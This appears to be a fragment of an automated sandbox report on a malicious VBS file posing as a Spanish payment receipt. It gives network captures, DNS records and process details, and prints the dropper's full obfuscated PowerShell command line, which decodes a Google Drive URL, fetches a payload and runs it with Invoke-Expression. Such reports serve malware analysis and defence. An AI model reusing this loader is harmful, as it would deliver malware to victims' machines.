                              Apr 24, 2024 07:02:02.899476051 CEST44349731142.251.2.132192.168.2.4
                              Apr 24, 2024 07:02:02.900669098 CEST49731443192.168.2.4142.251.2.132
                              Apr 24, 2024 07:02:02.944129944 CEST44349731142.251.2.132192.168.2.4
                              Apr 24, 2024 07:02:03.971719980 CEST44349731142.251.2.132192.168.2.4
                              Apr 24, 2024 07:02:03.971833944 CEST49731443192.168.2.4142.251.2.132
                              Apr 24, 2024 07:02:03.971846104 CEST44349731142.251.2.132192.168.2.4
                              Apr 24, 2024 07:02:03.971915960 CEST44349731142.251.2.132192.168.2.4
                              Apr 24, 2024 07:02:03.971965075 CEST49731443192.168.2.4142.251.2.132
                              Apr 24, 2024 07:02:03.971971035 CEST44349731142.251.2.132192.168.2.4
                              Apr 24, 2024 07:02:03.972140074 CEST44349731142.251.2.132192.168.2.4
                              Apr 24, 2024 07:02:03.972196102 CEST49731443192.168.2.4142.251.2.132
                              Apr 24, 2024 07:02:03.973767042 CEST49731443192.168.2.4142.251.2.132

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Apr 24, 2024 07:02:01.441956997 CEST5632953192.168.2.41.1.1.1
                              Apr 24, 2024 07:02:01.595830917 CEST53563291.1.1.1192.168.2.4
                              Apr 24, 2024 07:02:02.375155926 CEST5556853192.168.2.41.1.1.1
                              Apr 24, 2024 07:02:02.529369116 CEST53555681.1.1.1192.168.2.4

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Apr 24, 2024 07:02:01.441956997 CEST192.168.2.41.1.1.10x71eaStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                              Apr 24, 2024 07:02:02.375155926 CEST192.168.2.41.1.1.10x4355Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Apr 24, 2024 07:02:01.595830917 CEST1.1.1.1192.168.2.40x71eaNo error (0)drive.google.com142.250.101.100A (IP address)IN (0x0001)false
                              Apr 24, 2024 07:02:01.595830917 CEST1.1.1.1192.168.2.40x71eaNo error (0)drive.google.com142.250.101.138A (IP address)IN (0x0001)false
                              Apr 24, 2024 07:02:01.595830917 CEST1.1.1.1192.168.2.40x71eaNo error (0)drive.google.com142.250.101.101A (IP address)IN (0x0001)false
                              Apr 24, 2024 07:02:01.595830917 CEST1.1.1.1192.168.2.40x71eaNo error (0)drive.google.com142.250.101.139A (IP address)IN (0x0001)false
                              Apr 24, 2024 07:02:01.595830917 CEST1.1.1.1192.168.2.40x71eaNo error (0)drive.google.com142.250.101.102A (IP address)IN (0x0001)false
                              Apr 24, 2024 07:02:01.595830917 CEST1.1.1.1192.168.2.40x71eaNo error (0)drive.google.com142.250.101.113A (IP address)IN (0x0001)false
                              Apr 24, 2024 07:02:02.529369116 CEST1.1.1.1192.168.2.40x4355No error (0)drive.usercontent.google.com142.251.2.132A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • drive.google.com
                              • drive.usercontent.google.com

                              HTTPS Proxied Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.449730142.250.101.1004437348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              TimestampBytes transferredDirectionData
                              2024-04-24 05:02:02 UTC215OUTGET /uc?export=download&id=1kXTNaoxLJphfcAVSlYxVolD7HuHhKCJX HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: drive.google.com
                              Connection: Keep-Alive
                              2024-04-24 05:02:02 UTC1582INHTTP/1.1 303 See Other
                              Content-Type: application/binary
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                              Date: Wed, 24 Apr 2024 05:02:02 GMT
                              Location: https://drive.usercontent.google.com/download?id=1kXTNaoxLJphfcAVSlYxVolD7HuHhKCJX&export=download
                              Strict-Transport-Security: max-age=31536000
                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                              Content-Security-Policy: script-src 'nonce-1fb7d8-NtmtkC2XIrXok0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                              Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                              Cross-Origin-Opener-Policy: same-origin
                              Server: ESF
                              Content-Length: 0
                              X-XSS-Protection: 0
                              X-Frame-Options: SAMEORIGIN
                              X-Content-Type-Options: nosniff
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.449731142.251.2.1324437348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              TimestampBytes transferredDirectionData
                              2024-04-24 05:02:02 UTC233OUTGET /download?id=1kXTNaoxLJphfcAVSlYxVolD7HuHhKCJX&export=download HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: drive.usercontent.google.com
                              Connection: Keep-Alive
                              2024-04-24 05:02:03 UTC2120INHTTP/1.1 200 OK
                              X-GUploader-UploadID: ABPtcPoOhizefBrlhSOg-5nqYyDjQlXi5ryv-SPhIsPmWtXKpUOTF8vJQ5mGfwZtUhwR6e-8bQ
                              Content-Type: text/html; charset=utf-8
                              Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                              Date: Wed, 24 Apr 2024 05:02:03 GMT
                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                              Content-Security-Policy: script-src 'nonce--ln7oSX7E5RvjqwKZzogTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                              Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                              Cross-Origin-Opener-Policy: same-origin
                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                              Cross-Origin-Resource-Policy: same-site
                              reporting-endpoints: default="/_/DriveUntrustedContentHttp/web-reports?context=eJzj0tDikmJw0pBisN47ndUeiJ3SZ7CGAPHqn-dY1wPx4rDzrCuAWIiH4_SSRRvZBE7smTyRGQAHMxUJ"
                              Content-Length: 1692
                              Server: UploadServer
                              Set-Cookie: NID=513=HmcfVWYW2TJEEffq4Sr_uBNFvxa6A1CT9SsMLRCuaZuQaOz1vb-UvrF8BH2IniAKXWS3WAWizcUHHYYV36nWQiS7ARPjDJoHmLx5WVTBWT7W7vLwnMYuFBAT38ATp3m-XaWFWTr2ClXXG683fI0_eueyXx4jecMSlp1e3Uiii74; expires=Thu, 24-Oct-2024 05:02:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Content-Security-Policy: sandbox allow-scripts
                              Connection: close
                              2024-04-24 05:02:03 UTC1692INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 20 44 72 69 76 65 20 2d 20 49 6e 66 65 63 74 65 64 20 66 69 6c 65 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 72 39 32 61 7a 32 4e 78 6a 4b 64 78 51 2d 77 6e 72 6b 69 4e 51 22 3e 2e 67 6f 6f 67 2d 6c 69 6e 6b 2d 62 75 74 74 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6f 6c 6f 72 3a 23 31 35 63 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 75 72 73 6f 72
                              Data Ascii: <!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="kr92az2NxjKdxQ-wnrkiNQ">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:07:01:57
                              Start date:24/04/2024
                              Path:C:\Windows\System32\wscript.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs"
                              Imagebase:0x7ff7a17d0000
                              File size:170'496 bytes
                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:1
                              Start time:07:01:57
                              Start date:24/04/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(6)){$anthracolithic+=$Roadless.$civilisationen.Invoke($Kuldeblgerne, $Spiritusestes);}$anthracolithic;}function Multiplikatorernes($Fngsledes){. ($Tythed) ($Fngsledes);}$unlogged=Ulnage '.ceanMSkalaoB silz An.oiTimeblRadiolBevisaUnflu/Broom5Cacod.Engen0Ba.dh oplsn(Bu,gaWEnligiBilspnEmiredDatafo r,mow Unins oilo Kab.lNSalonTBr.kk Anac1 lom0 Kret. litu0Plagi;Total Ing.aWViz.ri egalnCarci6F,ske4C rru;Robus bidrax Grou6,kaer4arve ;Ek,am Fodfsr Luntv bene:Heme,1 T,lm2m end1Maend.Progr0 un.e)Predr TranGPlatfeEkspacSpr skCreamo tect/ Stan2Vask.0 Midw1 Lecy0Opskr0Perso1 Tilr0Eksam1etabl Ka.keFInteri Rgelr LucieknoerfAssobo F.rtxEleme/Esthe1Nnned2Allia1Anmel.Frede0Galip ';$Zootechnician=Ulnage 'UbrudUBermusKo,ere,kiderBusti- TramAamitigGgerdeWeaponBe,tmtConv ';$Blikdaases93=Ulnage ' .etrh necttGrimitKashipJustssSnerp:Manaf/ udbl/i ddadfarverInkasiDegorv,xploeM,sra..kyftgCapo oFantooGuigngA.tralBlk peAller..ntrac Subdo Cha mElpid/ElenduTailocrek.m?censueContexFemetpVebogoBill.rChastt Form=Asymmd Fun.oMikrowtransnVirtulForstoFoliaa Syklda aly& Railiabri dTilfa=Overf1 PolykcozenXGreteT ndemNPr.staRotato EftexDoeglL SeklJHypotpBruskhWoodbfRetracS.indA Sa.mV ChucSO.ymplDataeYDise.x Nyt.VPersooUdloelIn.erDOv.rs7,alelHEnleauUndubHEnleah BuksKBimleCalarmJForv.XVidsy ';$Timbalernes=Ulnage 'Pa,ie> Read ';$Tythed=Ulnage ' vermist,tset,lsjxTyde. ';$Conidium='Historicize';Multiplikatorernes (Ulnage 'P,psiSVlteneSlnggtMeteo-Filr C Wil oKlaptn Lym.tReinseZincenmyliut Fu.d Hemic-SpiseP N.nraP.robtChickh.onde ugenTOp ev:Retab\SydafV RummiPsychcRettea .amirStrmp.Kro.stB,bylxUpliftLed n A.rom-BiogrVCaramaTekstlSer,iuPelseeDingt Dy de$RulleCMa ero SeminImpliiRampidletpai Gn.du spanmV.jto;.nher ');Multiplikatorernes (Ulnage ' hizaiU skifunme, twelv(Est at Dekoe ngodsSjlert micr-TomatpengjaaTingetCharthBusre AakanTBaloc:Boghy\LandzVFumeriPremoc Ko,sasitcor,alsa.SwotttAftgtx Casit Depo)Forbr{D.mpveGeorgxNeuroi EscatRest.}Bermm;Ptsa, ');$Germind = Ulnage 'Cledge SwatcSwingh Strao.deli Trin%Backsa PincpKlamppBelbsdKvadraReflet Mi maVolut%Sqush\De,erSG mmioForetmAmplieArchesBol,gtRemsehMicr.eFejl sInconiSpiriaBoros.M,resST,nerkTypiseOd.rl Pella&Ti sm& Hall Be pee N.ttcSawbohNontioDepre Fraso$incor ';Multiplikatorernes (Ulnage 'domin$ .tolgStje lIn,oroSkarpbMut naBlo,llSt ig:CerasN MuniuOmplal GraniPluggnKanoedUnmelkKarbuoH.rdemTaws.sFolketFr.dreS,urrnMotte=Jrgen(P.eudcdebr.mI,cludVrks. ommis/Mastec Foli Te.n$AmesiGMoolee Deicr.ninnm,seudiFi,kon bankd M.te)Ratla ');Multiplikatorernes (Ulnage 'Metop$H.insglgegulJulefoTrg,ebF.rmuaFortelDek.i:EndomPPost.cJvn,aeTeglbrNo ennKontreKant,=Kia.c$Cu geB SkralUngkaiCamankass,cd YorkaFla,kaSa.ansalmineplumbsSeven9Mis n3Magts. Bunds ,udep MagnlStu,ei FoshtDrosk(.anso$B,oncT S.rii Hal,mGra,ubDominaJuleflGodfreResorrDistrnMonete Gon,sSpad )Kolle ');$Blikdaases93=$Pcerne[0];Multiplikatorernes (Ulnage 'hyste$MejetgKa hilGenneoScapub kil,aMo erl odbo:AltdeF StillKegleaRealla Udfre num dCecomeAfflas Cu a=Emo,iNMarsie ,ecywSolec-Vok eOKri,kbGromwjSpokee Alp.cm telt est R,kniSChampyPlatisFiksptRespeeSolstmArthr.SaalsNVedlieDentitNivel.C,ppeWPissoeTroopb exogC .ndmlRubbeir.geneFertinR,abatOverk ');Multiplikatorernes (Ulnage 'Uns.c$ orkyFcornllLogisaFo,ocaAr heeRehabdKor,meIna.ssEdder.HalsyHNonnaeDe,okaLnmo,d OctoeNi rorMakahsC.chi[,efen$DirekZ Rehoo VaadoPav,lt orskeBatekcMa.keh Ul,mnKluppi.progcMyeloiQuinta KratnMonod]Intra=Stj,t$AlmiruIlystnWel cldehumoMaalegMacergZuluke .ecrdLgdsl ');$Afsbe=Ulnage 'Bi,isFVideolSpermaRensnaHulleeOutwrd Fu,deStabisSkr s.hymenDAur.doZ chiw solinSnk mlGuffao Pr raMiliedToldsF Troni StrolV.scue Fu,u(Ballo$TetraBRussilimproi U,cokFelind Dis,aUn,ola Cha.sR puneAabe,sGreen9 ,itz3Ene.r,,ngka$ Te.aSCompalMesenaAfgifvS.atuiSdmlkcPu.leiClarssAktivmGynec)Samm. ';$Afsbe=$Nulindkomsten[1]+$Afsbe;$Slavicism=$Nulindkomsten[0];Multiplikatorernes (Ulnage ',uper$ sentg TodalRemado ,emtbBroncaSkridlIndfr:OtterbTrillr vsavnmattieForbdrStagniGenang Du.itPorceiAmbitgAntipt Oret=Preme( emicTH.rtaePerfesQueuetviske-Ansl.PRgt baWhysutkonsehFrems Stvl$Dje aSDividl BeboaUd,mnvVe.stiCrittc phioila insCanalmAntig)Brnee ');while (!$brnerigtigt) {Multiplikatorernes (Ulnage 'Stvht$FlgesgambitlLip roSk,lpbAi,maanrc,elRodma:UndisUSjl,gn Sd,krStuk,eHarefeHexoslA.usts Vask=A.sor$brnebtFa.ulrSowe.u,arsveFinva ') ;Multiplikatorernes $Afsbe;Multiplikatorernes (Ulnage '.eddaSMetattTropiakontrrSvendtArmad-GenneS Salgl Coque SvineNegripSemic L,sa4Drosc ');Multiplikatorernes (Ulnage ' St,r$Sadelg GawklSheepo ZoanbJageraRejuvl Beta:Intrab VacirVitt nFeasie UdskrMarroiS.uthgpetertForhaiCtenogNicottStres=Ph.no( Go aT TrekeBlufrsO,dbotjudie- eviPSpiseaIndsktMellsh.lymp Afste$ ndhfSAlkyllNydamaRegervBrygniPregucauto.iE,katsuma,dm rav) Uncr ') ;Multiplikatorernes (Ulnage ' ,rom$Over g,minolOsteooAfganbPolysaUdstalTerme: chuPAnacrrT,anseHenleeOutwav adreaDresspRetshoAntiorMrkbaab.llitPe.arolys,nrRosin2Famil5Overw5Alon,=Perfi$C zsegGlsnil PoleoTilskbF,rroaSa dslVatic: uldkSFre nkSamk.iHoopslAfhjed Tnd.psuperaVolvodR,ekadRa.ioe Tomjs Log kMe tra DisklHelfalHetere Kavin SalgsFinan+Tomas+Doura% .uni$KompeP halac Intee GnomrIndslnSlgerereaff.RecescPhospol resuTu ann C aitAfter ') ;$Blikdaases93=$Pcerne[$Preevaporator255];}Multiplikatorernes (Ulnage 'Dis,i$ Prs gJenvrl S.fforesunb ,ndhaG.ardl Etho: RagoePreofxRappetFritieUnshrn AfsluZonataCimeltSel.pePomfrsLin.e Koord=Kunst LandsGUdsleeSomnitunapp-GoldrCG.nero.nrusnF,nget UdsteprobonChiddtLigni Disti$FideiSDurrylRosmuaAzotiv F,owi Ca bc S,ili nugssBromams,kke ');Multiplikatorernes (Ulnage 'P gna$HammegM,cedl .dlaoAdvarbnyctiaSprngl Thai:SortkJUniveu.lassnNowisgTubereSpo.tnAntar D.sm= Nati G nan[ ,ngsSamicryBrndesForvatKursueAssurmAntit.critiC Ejenoin,skn.atiivGlasbe Tet,rLollate.han] vera:Spe.t: OmdaF GuilrAd.lsoWhaurmTra,sBSkaftaDisarsMrsgeeStutt6amanu4Haa dSSlvsmt,nartrP,rceiBeraanA tisgSt.rt(,fsbn$MaijaeS,imlxH riztv loueCheckn ApotuBore,aMorget FredeBack,sHaema)Rekto ');Multiplikatorernes (Ulnage 'Kv li$ExcalgLipaelstatsoStamkbKapseadittel Gard:BatchFKvienoGaranr dfylmOr.adi J.rln BrowdLeaves Mungk L,moeAbortdOutrieNedsksTill. Ba,sk=flako Opsp[S.oroSsubcayR,mblsTafiat wargestemmmGdann. FilaT.tivkePursuxAger,tUigen.Su.phESk,ffnObskuc GardoOverbd etriTropin Petegsigte] Unco:Sfyrb:Sub oAFane,SAnnitC.tykpICo.meIMento. NaioG telteDissotBrintSVidnet Regnr,mpori ayinnGaiasgRing (Ach.n$NonexJSusp.uBatisnRick gCaj.teL.dlenConvo) egre ');Multiplikatorernes (Ulnage 'F.age$Te.reg Frikl UdenoKos.eb IldfaExtralNonig:sminkcMenarhlin,oeGor lcUfuldkOutruhAra ieLarmefrhabdtCun,ieWittitFrems=Preco$ multFCurcuoG anirInfiemBearii StubnFlovpd StiksDelp.kTot.ee Vidtd Yu,eeFablesDesta. Pe,isF lthuSkillbHerlisPolyctFo slr ForhiFor,in ThyrgOptic( Spec2Ickin9Hotel7Inc,m6Forbr8Asphy4deute,Siksa2Civ l8Phyll0Unind8 In.v1Riste)Bykva ');Multiplikatorernes $checkheftet;"
                              Imagebase:0x7ff788560000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:2
                              Start time:07:01:57
                              Start date:24/04/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:3
                              Start time:07:02:00
                              Start date:24/04/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Somesthesia.Ske && echo $"
                              Imagebase:0x7ff6e97b0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Disassembly

                              Reset < >

                                Executed Functions

                                Function 00007FFD9B949C09 Relevance: .5, Instructions: 476COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.1827463692.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7ffd9b940000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7f171ca1d00b68ae0acceade6176f8c3d95abfacf649c8921ef672f0e0136c2e
                                • Instruction ID: 91e6415ed91101f7aafd95e2dc7e52af6cdf1bf5caaf89f285e918e91e347fcf
                                • Opcode Fuzzy Hash: 7f171ca1d00b68ae0acceade6176f8c3d95abfacf649c8921ef672f0e0136c2e
                                • Instruction Fuzzy Hash: 28E16831B1FA9E1FEBA5DBAD48795B57BE2EF55214B1901FAD05DC70E3CA28AC018301
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFD9B944A75 Relevance: .4, Instructions: 432COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.1827463692.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7ffd9b940000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 687c605b191bc9e9b5ff6078ce38598d2d8ab68999a1131769fc9346082d9605
                                • Instruction ID: 375e5dc8311945e6bc6b42eaa76ae121a091b353efcd663c657d69765c285270
                                • Opcode Fuzzy Hash: 687c605b191bc9e9b5ff6078ce38598d2d8ab68999a1131769fc9346082d9605
                                • Instruction Fuzzy Hash: ADD16631B1EA9D1FE7B9EBA848656B97BA2EF41310F0900FED05CC71E3DD18A8058341
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFD9B949DA7 Relevance: .2, Instructions: 156COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.1827463692.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7ffd9b940000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 14e859375cf68c39959bac356ab10d1bd63f58a652f1a2f5bada4b35771070a8
                                • Instruction ID: 381fdcac2406e883365e726638cacf81ef44c1e51794a75011045352c3f1b11a
                                • Opcode Fuzzy Hash: 14e859375cf68c39959bac356ab10d1bd63f58a652f1a2f5bada4b35771070a8
                                • Instruction Fuzzy Hash: 72512232F2FADE1FE7A5DBAD08791B56BD2AF55254B5A00BAD05CC71E3DD28AC408301
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFD9B873945 Relevance: .0, Instructions: 49COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.1827100125.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7ffd9b870000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                • Instruction ID: eb7a46cdb0012eff6e5c38bb0d8d527c599f3350d087005d384069ff07837e75
                                • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                • Instruction Fuzzy Hash: FD01A73020CB0C4FD748EF0CE451AA5B3E0FB89324F10056DE58AC36A1D632E882CB42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 00007FFD9B8785FA Relevance: 6.4, Strings: 5, Instructions: 123COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1827100125.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7ffd9b870000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: O_^$O_^$O_^$O_^$O_^
                                • API String ID: 0-2660881393
                                • Opcode ID: 12f438d09a6740beeb2fa742dd70f367b9a47cce233cf849700d508212fd7915
                                • Instruction ID: ddad29041beb889f918e4b23d9e8e66925d0aeded4c926a2ab593cb5facc51bb
                                • Opcode Fuzzy Hash: 12f438d09a6740beeb2fa742dd70f367b9a47cce233cf849700d508212fd7915
                                • Instruction Fuzzy Hash: FC31CA63E1FAD65FE662876B88BD0902BA0FF5675970A41F7C0EF4B193EC153A074202
                                Uniqueness

                                Uniqueness Score: -1.00%